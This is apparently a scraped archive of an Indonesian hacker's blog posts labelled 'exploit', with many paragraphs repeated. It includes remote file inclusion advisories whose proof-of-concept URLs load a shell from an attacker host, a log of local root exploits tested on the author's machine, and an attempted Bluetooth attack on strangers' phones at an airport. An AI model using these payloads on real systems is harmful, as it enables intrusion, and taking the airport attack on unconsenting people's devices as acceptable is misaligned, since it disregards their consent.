And for all the team that played yesterday, you can use this skeleton (only with calc payload) exploit to wrap up your remote-code-execution exploit and get the flag.txt file at Desktop directory (inside the Windows VM you are copying).
y3dips shares stories about life, family, hacking, computer security, and *nix.
Showing posts with label exploit. Show all posts
Showing posts with label exploit. Show all posts
Monday, June 17, 2013
IDSECCONF 2013 ctf offline: exploitation challenge (500) exploit
And for all the team that played yesterday, you can use this skeleton (only with calc payload) exploit to wrap up your remote-code-execution exploit and get the flag.txt file at Desktop directory (inside the Windows VM you are copying).
Thursday, October 15, 2009
Updating Backtrack-4 Beta ke "pwnsauce"
Sebenarnya sudah lama image vmware backtrack 4-beta nongkrong di hardisk gw, cuma baru kemaren sempat me-running-nya, karena di rasa out-of-date maka secepatnya harus di update :), berikut adalah langkah2 "kasar" dalam melakukan update Backtrack-4 Beta menjado Backtrack-4 PreFinal (pwnsauce):
Sebelumnya, tambahkan terlebih dahulu Repo backtrack terlebih dahulu:
dan hapus repo backtrack (repo.offensive-security.com) yang sudah tidak berfungsi, kemudian lakukan upgrade OS yang notabene dibangun dengan Ubuntu Intrepid Ibex (8.10), terlebih dahulu tambahkan gpg key untuk ppa.launchpad.net
Proses upgrade dari BT4 Beta akan merusak KDE anda alias "startx" tidak bekerja, dan untuk memperbaikinya, lakukan sbb:
Upgrade pentest paket, pilih no 1, kemudian 9 untuk upgrade keseluruhan
Selamat menikmati :)
Sebelumnya, tambahkan terlebih dahulu Repo backtrack terlebih dahulu:
- Menambahkan GPG Key,
root@bt:~#wget -q http://archive.offensive-security.com/backtrack.gpg -O- | apt-key add -
- Menambahkan repo BackTrack 4,
root@bt:~#echo "deb http://archive.offensive-security.com pwnsauce main microverse\
macroverse restricted universe multiverse" >> etc/apt/sources.list
dan hapus repo backtrack (repo.offensive-security.com) yang sudah tidak berfungsi, kemudian lakukan upgrade OS yang notabene dibangun dengan Ubuntu Intrepid Ibex (8.10), terlebih dahulu tambahkan gpg key untuk ppa.launchpad.net
root@bt:~#apt-get update && apt-get dist-upgrade -y
Proses upgrade dari BT4 Beta akan merusak KDE anda alias "startx" tidak bekerja, dan untuk memperbaikinya, lakukan sbb:
root@bt:~# cd /etc/alternatives/
root@bt:/etc/alternatives# mv x-session-manager x-session-manager-broken
root@bt:/etc/alternatives# ln -s /opt/kde3/bin/startkde x-session-manager
root@bt:/etc/alternatives# startx
Upgrade pentest paket, pilih no 1, kemudian 9 untuk upgrade keseluruhan
root@bt:/pentest/exploits#./fast-track.py -i
Selamat menikmati :)
Thursday, July 09, 2009
milw0rm Down, goodbye str0ke ...
Update: str0ke untuk sementara waktu akan mengaktifkan kembali milw0rm, serta mengupload beberapa posting yang masih terdapat di inbox milw0rm, tetapi belum tau sampai kapan dia akan melakukan itu sebelum menyerahkan milw0rm. (update via str0ke twitter)
milw0rm.com sebuah situs yang menjadi database untuk berbagai jenis kode exploit, paper, shellcode, video dan advisories yang berdiri sejak akhir 2003 yang di gawangi oleh str0ke ini akhirnya tidak bisa di akses sejak hari ini. str0ke sendiri telah mengumumkan perpisahaannya dihalaman depan situs milw0rm itu kemarin.
Belum diketahui pasti apakah penutupan milw0rm hanya untuk sementara atau untuk selamanya, milw0rm sendiri yang sejak kemunculannya di 2003 telah menyita seluruh perhatian komunitas keamanan informasi di Internet, bahkan eksistensinya untuk tetap membantu menyebarkan eksploit gratis bahkan mematikan berbagai "exploit market".
Well, goodbye milw0rm, good bye and have great success str0ke my friends :)
milw0rm's back up & posting will start once again, I can't let all of the emails in my submit box to just sit there.Setelah sebelumnya dia memastikan untuk meng-handover milw0rm
I have talked with a few friends and I'll be handing the site over so a group of people can add exploits / other things to the site. Hopefully it will be a new good start
milw0rm.com sebuah situs yang menjadi database untuk berbagai jenis kode exploit, paper, shellcode, video dan advisories yang berdiri sejak akhir 2003 yang di gawangi oleh str0ke ini akhirnya tidak bisa di akses sejak hari ini. str0ke sendiri telah mengumumkan perpisahaannya dihalaman depan situs milw0rm itu kemarin.
Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don’tInformasi mengenai hal ini gw dapat oleh K-159 yang paling sering berkomunikasi dengan str0ke dibandingkan staff echo yang lain, str0ke sendiri sebagai individu cukup bersahabat dengan beberapa staff echo, baik dalam hal mendiskusikan berbagai bug yang di temukan dan rilis dalam advisories sampai kepada membahas konferensi setingkat Defcon. Dan terakhir diskusi yang gw lakukan dengan str0ke adalah saat membahas firefox eksploit yang baru-baru ini gw rilis.. For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn’t fair to the authors on this site. I appreciate and thank everyone for their support in the past.
Be safe, /str0ke
Belum diketahui pasti apakah penutupan milw0rm hanya untuk sementara atau untuk selamanya, milw0rm sendiri yang sejak kemunculannya di 2003 telah menyita seluruh perhatian komunitas keamanan informasi di Internet, bahkan eksistensinya untuk tetap membantu menyebarkan eksploit gratis bahkan mematikan berbagai "exploit market".
Well, goodbye milw0rm, good bye and have great success str0ke my friends :)
Thursday, June 04, 2009
Linux kernel exploit are sold out!

Dari 6 buah exploit yang terbaris di list teratas "linux kernel exploit" di situs milw0rm, gw segera mendownload kelimanya, bah kenapa hanya 5? karena untuk SCTP gw sudah pernah mencobanya dan juga gw sudah yakin dengan konfigurasi kernel gw yang SCTP-nya belum gw implementasikan di kernel gw.
ammar@venom ~/pentest/local $ uname -a
Linux venom.arachn.ids 2.6.27-gentoo-r7 #1 SMP Tue May 26 13:53:14 UTC 2009 i686 Genuine Intel(R) CPU T2300 @ 1.66GHz GenuineIntel GNU/Linux
ammar@venom ~/pentest/local $ ls
8369.sh 8478.sh 8572.c 8673.c 8678.c
ammar@venom ~/pentest/local $ chmod +x *
ammar@venom ~/pentest/local $ ./8369.sh
suid_dumpable=0 - system not vulnerable!
ammar@venom ~/pentest/local $ ./8478.sh 9230
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
suid.c:3: warning: missing sentinel in function call
sh-4.0$ id
uid=1000(ammar) gid=100(users) groups=4(adm),10(wheel),11(floppy),18(audio),19(cdrom),20(dialout),26(tape),100(users),444(plugdev),1001(truecrypt)
sh-4.0$
ammar@venom ~/pentest/local $ ./8572 9230
[-] Error: /tmp/run does not exist, please create it
ammar@venom ~/pentest/local $ touch /tmp/run
ammar@venom ~/pentest/local $ ./8572 9230
ammar@venom ~/pentest/local $
ammar@venom ~/pentest/local $ ./8673
[+] EIP - 0xb7e5bb1f
[+] Waiting for root...
[-] Damn no r00t here :(
ammar@venom ~/pentest/local $
Dan ternyata dari kelima eksploit tersebut 4 buah eksploit gagal memberikan root, dan 1 eksploit gagal di kompile, seluruh ujicoba dilakukan dengan tanpa perbaikan pada eksploit dan proses kompilasi, artinya apabila secara default dikomputer saya tidak terinstall library tertentu, atau tidak memenuhi kondisi khusus dari eksploitasi, hal itu dianggap bahwa secara default (konfigurasi) neo-venom relatif aman terhadap kelima buah eksploit tersebut.
Mari kita bahas eksploit pertama, eksploit 1 (8369.sh), eksploit ini secara default tidak akan bekerja, karena apa? karena eksploit ini memerlukan "/proc/sys/fs/suid_dumpable" untuk di set 1 atau 2, sedangkan defaultnya adalah 0,
venom local # cat /proc/sys/fs/suid_dumpable
0
venom local # echo "1" > /proc/sys/fs/suid_dumpable
venom local # cat /proc/sys/fs/suid_dumpable
1
dan apabila dilakukan eksploitasi ulang
ammar@venom ~/pentest/local $ ./8369.sh
logrotate installed, that's good!
Compiling the bash setuid() wrapper...
Compiling the exploit code...
Setting coredump limits and running the exploit...
Successfully coredumped into the logrotate config dir
Now wait until cron.daily executes logrotate and makes your shell wrapper suid
The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you'll be root
Your terminal is most probably screwed now, sorry for that...
Dan ternyata setelah 24 jam shell (.m) tersebut tidak memberikan root :p, walaupun ga perlu menunggu waktu dua jam, cukup dengan hanya membandingkan hasil "ls -al" sudah memberikan jawaban, dan karena misi kali ini cuma mencoba eksploit tanpa mempatch exploit, jadi exploit ini di nilai tetap gagal (2 kali gagal) di neo-venom.
ammar@venom ~/pentest/local $ /tmp/.m
ammar@venom ~/pentest/local $
Selanjutnya, eksploit kedua (8478.sh) dan ketiga (8572.c) mengeksploitasi UDEV dengan versi dibawah 141, dan karena udev yang gw miliki adalah 141, jadi eksplotasi ini hanya men"spwaning shell", tetapi tidak meng'escalate priveledge' dari user menjadi root, sekali lagi gw tegaskan, gw tidak mem"pacth" eksploit ini, sebagai contoh memperbaiki error dari eksploit tsb, karena tujuan dari penulisan ini adalah maen eksekusi aja suatu skrip dengan kiddo style :P.
Eksploit ke 4 (8673.c) &5 (8678.c) untuk kernel 2.6.29-x yang mengeksploitasi celah pada Ptrace_attach tidak akan mempan karena kernel yang saya gunakan adalah 2.6.27 :p
Dan terbukti secara "kiddo style", neo-venom kebal dari ke-5 eksploit root yang beredar. :)
Saturday, March 03, 2007
w[X]f project are pending!
During the project progress, i officially pending this project for unknown time.

WebXploit Framework also known as w[X]f is an Exploit Framework that provide usefull information (such as vulnerabillities or exploit library) to perform web application assessment or web penetration testing.
Detail project
Special thaks to ftp_geo for sharing time and idea, great success for you .. , ill wait the time where we can work this out again
thanks for all people who has intend for great supporting and willing to join us, also sent us many of fantastic feedback.
you can always send a feedback, comment or spirit about this project to y3dips[et]gmail.com

WebXploit Framework also known as w[X]f is an Exploit Framework that provide usefull information (such as vulnerabillities or exploit library) to perform web application assessment or web penetration testing.
Detail project
+ Project Name : WebXploit Framework
+ Unique Name : w[x]f
+ web : http://wxf.blogsome.com
-- (formerly http://wxf.siteburg.com are closed by the web hosting)
+ member : y3dips, ftp_geo
+ License : GNU/GPL
+ Prog language: PERL
+ OS : Independent
+ Description : Exploit Framework for web assessment
+ Started : April 2005
Special thaks to ftp_geo for sharing time and idea, great success for you .. , ill wait the time where we can work this out again
thanks for all people who has intend for great supporting and willing to join us, also sent us many of fantastic feedback.
you can always send a feedback, comment or spirit about this project to y3dips[et]gmail.com
Friday, March 02, 2007
Month Of PHP Bugs
Stefan Esser from php-security.org has declared war on vulnerabilities in the PHP core with the "Month of PHP Bugs" or MOPB. During March 2007, theres already five vulnerabilities are in a list, also with some proof of concept "exploit" code provided, esser stated that this because on the one hand some people do not believe that a vulnerability is exploitable (maybe because their attempts failed) and on the other hand the lack of exploit code that tests for a certain vulnerability is the major reason why PHP vulnerabilities are sometimes not correctly fixed or why the same bugs are later reintroduced.
Esser stressed, that this initiative is as an effort to improve the security of PHP. However it wont concentrate on problems in the PHP language that might result in insecure PHP applications, but on security vulnerabilities in the PHP core.
MOPB Are not cover PHP applications vulnerabilities.
PHP is a popular and widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML, you can see how popular it is.

source: http://www.php.net/usage.php
Esser stressed, that this initiative is as an effort to improve the security of PHP. However it wont concentrate on problems in the PHP language that might result in insecure PHP applications, but on security vulnerabilities in the PHP core.
MOPB Are not cover PHP applications vulnerabilities.
"If you want a month of PHP application bugs you can subscribe to the bugtraq or full-disclosure mailinglists. Our initiative concentrates on bugs in the PHP standard distribution. However we might add some bonus bugs in software related to PHP but not PHP applications."- esser statedMeanwhile, In the same time (March, 1st 2007) The PHP development team announce the immediate release of PHP 4.4.6, see the Changelog for details,
PHP is a popular and widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML, you can see how popular it is.

source: http://www.php.net/usage.php
Sunday, February 11, 2007
[ECHO_ADV_64$2007] Openi CMS plugins (site protection) remote file inclusion
Author : Ahmad Muammar W.K (a.k.a) y3dips
Date Found : February, 11 2007
Location : Indonesia, Jakarta
web : http://echo.or.id/adv/adv64-y3dips-2007.txt
Critical Lvl : Critical
------------------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Internal range (site protection), version: 1.0
Openi CMS plugins (http://www.openi-cms.org)
URL : http://www.openi-cms.org
Download-path : http://www.openi-cms.org/oi-download.php/45/file_src/oi_plugin_site_protection_1_0.zip
Description : With this Plugin you can release page ranges only for certain users. The user
must authentifizieren itself with user name and password. Several users for
a page range can be put on. Users and sides which can be protected are put on
in the editorship environment by the administrator.
Vulnerability:
~~~~~~~~~~~~~~
Variables "oi_dir" in index.php are not properly sanitized.
---------------index.php --------------------
global $config;
require_once($config["oi_dir"]."/base/sitemap_classes.php");
class plg_site_protection extends Plugin {
----
An attacker can exploit this vulnerability with a simple php injection script.
Poc/Exploit:
~~~~~~~~~~~~
http://target-openi/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=http://attacker/shell.php?
Notes:
~~~~~~
i have to change the variable "oi_dir" to "openi_dir" to get the cms works (config file),
but then u just change the exploit to
http://target-openi/open-admin/plugins/site_protection/index.php?config%5bopeni_dir%5d=http://attacker/shell.php?
it doesnt matter coz the variable still unsanitized.
Greetz:
~~~~~~~
ana, K-159, the_day, str0ke, waraxe, negative
Date Found : February, 11 2007
Location : Indonesia, Jakarta
web : http://echo.or.id/adv/adv64-y3dips-2007.txt
Critical Lvl : Critical
------------------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Internal range (site protection), version: 1.0
Openi CMS plugins (http://www.openi-cms.org)
URL : http://www.openi-cms.org
Download-path : http://www.openi-cms.org/oi-download.php/45/file_src/oi_plugin_site_protection_1_0.zip
Description : With this Plugin you can release page ranges only for certain users. The user
must authentifizieren itself with user name and password. Several users for
a page range can be put on. Users and sides which can be protected are put on
in the editorship environment by the administrator.
Vulnerability:
~~~~~~~~~~~~~~
Variables "oi_dir" in index.php are not properly sanitized.
---------------index.php --------------------
global $config;
require_once($config["oi_dir"]."/base/sitemap_classes.php");
class plg_site_protection extends Plugin {
----
An attacker can exploit this vulnerability with a simple php injection script.
Poc/Exploit:
~~~~~~~~~~~~
http://target-openi/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=http://attacker/shell.php?
Notes:
~~~~~~
i have to change the variable "oi_dir" to "openi_dir" to get the cms works (config file),
but then u just change the exploit to
http://target-openi/open-admin/plugins/site_protection/index.php?config%5bopeni_dir%5d=http://attacker/shell.php?
it doesnt matter coz the variable still unsanitized.
Greetz:
~~~~~~~
ana, K-159, the_day, str0ke, waraxe, negative
Wednesday, January 31, 2007
[ECHO_ADV_63$2007] Cadre remote file inclusion
Author : Ahmad Muammar W.K (a.k.a) y3dips
Date Found : January, 31st 2007
Location : Indonesia, Jakarta
web : http://echo.or.id/adv/adv63-y3dips-2007.txt
Critical Lvl : Critical
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Cadre
URL : http://www.cronosys.com | http://savannah.gnu.org/projects/cadre/
Download-path : http://ftp.azc.uam.mx/mirrors/gnu/savannah/files/cadre/cadre-20020724.tar.gz
Description : Cadre is a PHP framework for developing large business applications.
It currently supports PostgreSQL as the database back end (although
this is extensible).
Vulnerability:
~~~~~~~~~~~~~~
-----class.Quick_Config_Browser.php ----
include_once($GLOBALS[config][framework_path] . "class.Browser.php");
-------
An attacker can exploit this vulnerability with a simple php injection script.
Poc/Exploit:
~~~~~~~~~~~~
http://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://attacker/shell.php?
Greetz:
~~~~~~~
ana, K-159, the_day, str0ke, waraxe, negative
Date Found : January, 31st 2007
Location : Indonesia, Jakarta
web : http://echo.or.id/adv/adv63-y3dips-2007.txt
Critical Lvl : Critical
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Cadre
URL : http://www.cronosys.com | http://savannah.gnu.org/projects/cadre/
Download-path : http://ftp.azc.uam.mx/mirrors/gnu/savannah/files/cadre/cadre-20020724.tar.gz
Description : Cadre is a PHP framework for developing large business applications.
It currently supports PostgreSQL as the database back end (although
this is extensible).
Vulnerability:
~~~~~~~~~~~~~~
-----class.Quick_Config_Browser.php ----
include_once($GLOBALS[config][framework_path] . "class.Browser.php");
-------
An attacker can exploit this vulnerability with a simple php injection script.
Poc/Exploit:
~~~~~~~~~~~~
http://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://attacker/shell.php?
Greetz:
~~~~~~~
ana, K-159, the_day, str0ke, waraxe, negative
Monday, January 22, 2007
[ECHO_ADV_62$2007] Upload Service 1.0 remote file inclusion
Author : Ahmad Muammar W.K (a.k.a) y3dips
Date Found : January, 21st 2007
Location : Indonesia, Jakarta
web : http://echo.or.id/adv/adv62-y3dips-2007.txt
Critical Lvl : Critical
------------------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Upload Service
version : 1.0
URL : http://bild-bearbeiten.de/
Download-path : http://bild-bearbeiten.de/scripts/upload_service_1.0.zip
---------------------------------------------------------------------------
1. Install directory are not being remove after installation process
2. Variables "$maindir" in top.php are not properly sanitized.
---------------top.php--------------------------------
...
include($maindir."config.php");
include($maindir."functions/error.php");
...
------------------------------------------------------------------
When register_globals=on and allow_fopenurl=on an attacker can exploit
this vulnerability with a simple php injection script.
Poc/Exploit:
~~~~~~~~~~
http://127.0.0.1/upload/top.php?maindir=http://127.0.0.1/shell.php?
Solution:
~~~~~~~
- Remember to remove your install directory and change config.php permission
- Simply Sanitize variable $maindir on affected files. (eg. $maindir=" ";)
- Turn off register_globals
Notification:
~~~~~~~~~~
vendor not contact yet
Date Found : January, 21st 2007
Location : Indonesia, Jakarta
web : http://echo.or.id/adv/adv62-y3dips-2007.txt
Critical Lvl : Critical
------------------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Upload Service
version : 1.0
URL : http://bild-bearbeiten.de/
Download-path : http://bild-bearbeiten.de/scripts/upload_service_1.0.zip
---------------------------------------------------------------------------
1. Install directory are not being remove after installation process
2. Variables "$maindir" in top.php are not properly sanitized.
---------------top.php--------------------------------
...
include($maindir."config.php");
include($maindir."functions/error.php");
...
------------------------------------------------------------------
When register_globals=on and allow_fopenurl=on an attacker can exploit
this vulnerability with a simple php injection script.
Poc/Exploit:
~~~~~~~~~~
http://127.0.0.1/upload/top.php?maindir=http://127.0.0.1/shell.php?
Solution:
~~~~~~~
- Remember to remove your install directory and change config.php permission
- Simply Sanitize variable $maindir on affected files. (eg. $maindir=" ";)
- Turn off register_globals
Notification:
~~~~~~~~~~
vendor not contact yet
Wednesday, November 01, 2006
new Exploit shutdown XP SP2 firewall
New exploit for microsoft windows has been released on internet; this exploit disable the firewall embedded in the operating system. This exploit targeting ICS (Internet Connection Sharing) feature in Windows XP (lets users share a dial-up or broadband connection with other users on a home network). An attacker could only attempt to exploit this issue from local network: It cannot be remotely exploited.
Milw0rm published exploit for this issue
Milw0rm published exploit for this issue
Saturday, October 28, 2006
Bluetooth live-pentest [DW]
Baru sempet bagi-bagi cerita soal mudik setelah gw balik lagi ke"markas" (secara gw baru aja nyampe tadi), mungkin kalo cerita std atau "biasa" gak perlu gw ceritain gimana suka-dukanya mudik, tapi gw sedikit mo bagi "skrinsot" sama sedikit cerita tentang live pen-test yang gw lakukan (kids, dont try this at home :p).
Sembari menunggu keberangkatan (maklum, gw di paksa dateng lebih awal 3 jam dari keberangkatan di karenakan "maskapai" membroadcast message tentang penerbangan yang di majukan (gw tau, ini taktik buat jebak yang telat kan? :P) dan padahal penerbangannya juga malah di undur waktunya baik saat gw saat pergi dan pulang (svck.. licik)), oke balik lagi ..
here we go.. di ruang tunggu gw iseng aja keluarin laptop (agak tengsin sih sebenernya, cuma cuek ah), rencananya mo internetan tapi karena pulsa gw tipis, alhasil gw iseng aja ngelakuin "bluetooth live-pentest" di bandara.. ( bagi yang belum konek bisa cek artikel gw di ezine issue 15 yang berjudul 101 bluetooth [in]security )

standar aja, gw cuma cek device pake perintah "hciconfig -a" (yang bikin gw kebingunggan adalah kenapa tiba tiba device gw berubah di saat yang berjeda sedikit sekali, yah gw cuekin aja, toh ntar juga "usb-dongle" gw tiba tiba gak kedetect .. lanjut dulu degh )

tuh kan gak kedetect tiba tiba ? (apa karena gw "pangku" laptopnya? dan emang usb slot gw agak-agak error gitchu), udah ah lanjut aja di scan... dan dapet 2 device yang nyala ...

akhirnya gw scan ulang sambil pegangin "dongle", ... gyah .. dan sampai akhirnya tinggal 1 yang kedetect ( mungkin yang satu dah berjalan menjauh, maklum dogle gw cuma efektif dibawah radius 10 meter)

selanjutnya kita perlu untuk mendapatkan info lebih banyak tentang "target" , salah satunya mengetahui service apa yang di jalankan oleh device. hum, lemayan ...

karena gw sedikit familiar dengan beberapa address dari device tertentu (informasi vendor (e.g s.e, nok*a dsb) tersimpan juga di alamat tersebut), dan seingat gw itu bukanlah tipikal milik s.e, nok*a, dan si##ens, jadi aku langsung aja melakukan "Helo Moto" attack (serangan terhadap motor**a device)... tetapi eh tetapi tiba tiba saja batere laptop habis (maklum dah tua dan dah gampang drop (apalagi jika CPU di paksa kerja rodi, misal tuk scanning dsb)),dan mungkin gw kurang beruntung atau "target" yang beruntung :P
Anyway, gw cuma mo membuktikan kalo masih banyak dari kita yang tidak "aware" dan tidak ada maksud destruktif dibaliknya ..
p.s: Advice, directions and instructions on this article are for educational purposes only, y3dips does not accept responsibility for any damage or injury caused as a result of its use ... :p; [DW] pada judul berarti "DEWASA" :P
Sembari menunggu keberangkatan (maklum, gw di paksa dateng lebih awal 3 jam dari keberangkatan di karenakan "maskapai" membroadcast message tentang penerbangan yang di majukan (gw tau, ini taktik buat jebak yang telat kan? :P) dan padahal penerbangannya juga malah di undur waktunya baik saat gw saat pergi dan pulang (svck.. licik)), oke balik lagi ..
here we go.. di ruang tunggu gw iseng aja keluarin laptop (agak tengsin sih sebenernya, cuma cuek ah), rencananya mo internetan tapi karena pulsa gw tipis, alhasil gw iseng aja ngelakuin "bluetooth live-pentest" di bandara.. ( bagi yang belum konek bisa cek artikel gw di ezine issue 15 yang berjudul 101 bluetooth [in]security )

standar aja, gw cuma cek device pake perintah "hciconfig -a" (yang bikin gw kebingunggan adalah kenapa tiba tiba device gw berubah di saat yang berjeda sedikit sekali, yah gw cuekin aja, toh ntar juga "usb-dongle" gw tiba tiba gak kedetect .. lanjut dulu degh )

tuh kan gak kedetect tiba tiba ? (apa karena gw "pangku" laptopnya? dan emang usb slot gw agak-agak error gitchu), udah ah lanjut aja di scan... dan dapet 2 device yang nyala ...

akhirnya gw scan ulang sambil pegangin "dongle", ... gyah .. dan sampai akhirnya tinggal 1 yang kedetect ( mungkin yang satu dah berjalan menjauh, maklum dogle gw cuma efektif dibawah radius 10 meter)

selanjutnya kita perlu untuk mendapatkan info lebih banyak tentang "target" , salah satunya mengetahui service apa yang di jalankan oleh device. hum, lemayan ...

karena gw sedikit familiar dengan beberapa address dari device tertentu (informasi vendor (e.g s.e, nok*a dsb) tersimpan juga di alamat tersebut), dan seingat gw itu bukanlah tipikal milik s.e, nok*a, dan si##ens, jadi aku langsung aja melakukan "Helo Moto" attack (serangan terhadap motor**a device)... tetapi eh tetapi tiba tiba saja batere laptop habis (maklum dah tua dan dah gampang drop (apalagi jika CPU di paksa kerja rodi, misal tuk scanning dsb)),dan mungkin gw kurang beruntung atau "target" yang beruntung :P
Anyway, gw cuma mo membuktikan kalo masih banyak dari kita yang tidak "aware" dan tidak ada maksud destruktif dibaliknya ..
p.s: Advice, directions and instructions on this article are for educational purposes only, y3dips does not accept responsibility for any damage or injury caused as a result of its use ... :p; [DW] pada judul berarti "DEWASA" :P
Monday, July 17, 2006
Beware, Root are S0ld out!
Setelah cukup lama tidak terbitnya (beredar di pasaran) berbagai 0day exploit yang capable dalam mengambil alih r00t baik secara remote dan lokal, dalam 1 minggu ini malah sangat sangat amat ramai berkeliaran exploit yang dapat digunakan untuk melakukan "escalating priveledge", data berikut diperoleh dari milw0rm.com

Belum genap 1 minggu sudah terdapat lebih kurang 7 buah exploit yang dapat di gunakan untuk "mengambil alih" account root secara lokal, jikalau exploit terdahulu mengeksploitasinya dengan cara memanfaatkan celah pada kernel 2.6.13 s/d 2.6.17.4, dan 2.6.16 s/d 2.6.16.24 yaitu dengan diijinkannya "local user" untuk menciptakan denial of service dengan cara memakai resource secara berlebih (disk consumption) dan mengakibatkannya dapat mengambil alih kemampuan root (menggunakan argument "PR_SET_DUMPABLE" dari "prctl function"). Saat itu exploit yang beredar hanya specific untuk kernel ver 2.6.x tertentu, padahal berdasarkan publikasi di securityfocus , hampir seluruh versi kernel 2.6 memiliki celah ini

whats up r00t?

Belum genap 1 minggu sudah terdapat lebih kurang 7 buah exploit yang dapat di gunakan untuk "mengambil alih" account root secara lokal, jikalau exploit terdahulu mengeksploitasinya dengan cara memanfaatkan celah pada kernel 2.6.13 s/d 2.6.17.4, dan 2.6.16 s/d 2.6.16.24 yaitu dengan diijinkannya "local user" untuk menciptakan denial of service dengan cara memakai resource secara berlebih (disk consumption) dan mengakibatkannya dapat mengambil alih kemampuan root (menggunakan argument "PR_SET_DUMPABLE" dari "prctl function"). Saat itu exploit yang beredar hanya specific untuk kernel ver 2.6.x tertentu, padahal berdasarkan publikasi di securityfocus , hampir seluruh versi kernel 2.6 memiliki celah ini
Linux Kernel PRCTL Core Dump Handling Privilege Escalation VulnerabilitySabtu kemarin, akhirnya telah nongkrong salah satu exploit yang memanfaatkan file berukuran besar yang dijadikan lompatan untuk mengekploitasinya, dan breezy badger yang tadinya masih bisa bertahan terhadap exploit pertama, tak bertahan terhadap exploit ini :(
Bugtraq ID: 18874
Class: Design Error
CVE: CVE-2006-2451
Remote: No
Local: No
Published: Jul 06 2006 12:00AM
Updated: Jul 14 2006 11:53PM
Credit: Discovered by Red Hat security.
Vulnerable: Ubuntu Ubuntu Linux 5.10 sparc
Ubuntu Ubuntu Linux 5.10 powerpc
Ubuntu Ubuntu Linux 5.10 i386
Ubuntu Ubuntu Linux 5.10 amd64
Ubuntu Ubuntu Linux 5.0 4 powerpc
Ubuntu Ubuntu Linux 5.0 4 i386
Ubuntu Ubuntu Linux 5.0 4 amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
S.u.S.E. SUSE Linux Enterprise Server 10
S.u.S.E. SUSE Linux Enterprise Desktop 10
S.u.S.E. Open-Enterprise-Server 9.0
S.u.S.E. Novell Linux Desktop 9.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 10.1
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 10.1
S.u.S.E. Linux Enterprise Server 9
rPath rPath Linux 1
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux AS 4
RedHat Desktop 4.0
Linux kernel 2.6.17 .3
Linux kernel 2.6.17 .1
Linux kernel 2.6.17 -rc5
full list
Not Vulnerable: Linux kernel 2.6.17

whats up r00t?
Thursday, October 20, 2005
Metasploit v2.5
Yesterday, H D Moore has announce about the new version of Metasploit Framework. The Metasploit Framework is an advanced open-source exploit development platform. The 2.5 release includes three user interfaces, 105 exploits and 75 payloads.
This release is available from the Metasploit.com web site:
- Unix: http://metasploit.com/tools/framework-2.5.tar.gz
- Win32: http://metasploit.com/tools/framework-2.5.exe
A demonstration of the msfweb interface is running live from:
- http://metasploit.com:55555/
This release is available from the Metasploit.com web site:
- Unix: http://metasploit.com/tools/framework-2.5.tar.gz
- Win32: http://metasploit.com/tools/framework-2.5.exe
A demonstration of the msfweb interface is running live from:
- http://metasploit.com:55555/
Sunday, October 16, 2005
XSS worm floods Myspace
Antara Kaget dan tidak juga mendengar judulnya , pertama kali tahu dari temen temen di waraxe yang posting artikel soal ini di sini (maklum sekarang dah agak jarnag online) , kenapa aku gak terlalu kaget ? karena belum berapa lama aku telah menulis di blog ini juga tentang kemungkinan serangan yang bisa dilakukan dengan BBCODE dan HTMLcode [ baca juga from html to [bbcode] , disitu aku tidak melengkapi detil tekniknya dengan sengaja :p ] , eh malah muncul jenis worm baru yang cukup menghebohkan myspace.com (merupakan salah satu situs penyedia layanan untuk komunitas seperti friendster dan 360) yang beritanya di rangkum di betanews.com, dan juga di slashdot.org.
Ternyata perkataanku tentang "walau efeknya relatif lebih kecil terhadap system" di post sebelumnya harus aku tarik kembali karena ternyata hal ini terbukti mampu membuat " MySpace was taken offline while the worm was removed from all user profiles." , hehehehehhe .. interesting isnt it ???
Well, first i dont even know each other with that "clever" myspace user, second i dont just give a bullshit on my post in early month (coz ive already prove it *_^) , i tell u the same as i told u in my past post, "our world are so vulnerable" :) , so Watchout!
Ternyata perkataanku tentang "walau efeknya relatif lebih kecil terhadap system" di post sebelumnya harus aku tarik kembali karena ternyata hal ini terbukti mampu membuat " MySpace was taken offline while the worm was removed from all user profiles." , hehehehehhe .. interesting isnt it ???
Well, first i dont even know each other with that "clever" myspace user, second i dont just give a bullshit on my post in early month (coz ive already prove it *_^) , i tell u the same as i told u in my past post, "our world are so vulnerable" :) , so Watchout!
Wednesday, September 28, 2005
From html to [bbcode]
Injection never end ... , User user yang sedikit mampu berfikir dan mau berfikir sebenernya sangatlah mudah untuk memanfaatkan semua keleluasaan yang di berikan oleh penyedia layanan , walau efeknya relatif lebih kecil terhadap system ( secara keseluruhan tetapi tidak bisa dipandang sebelah mata ) dan hal ini di dukung pula oleh bantuan web browser yang semakin "user friendly" mengakibatkan hal ini berulang kali terjadi baik dari dulu hingga sekarang.
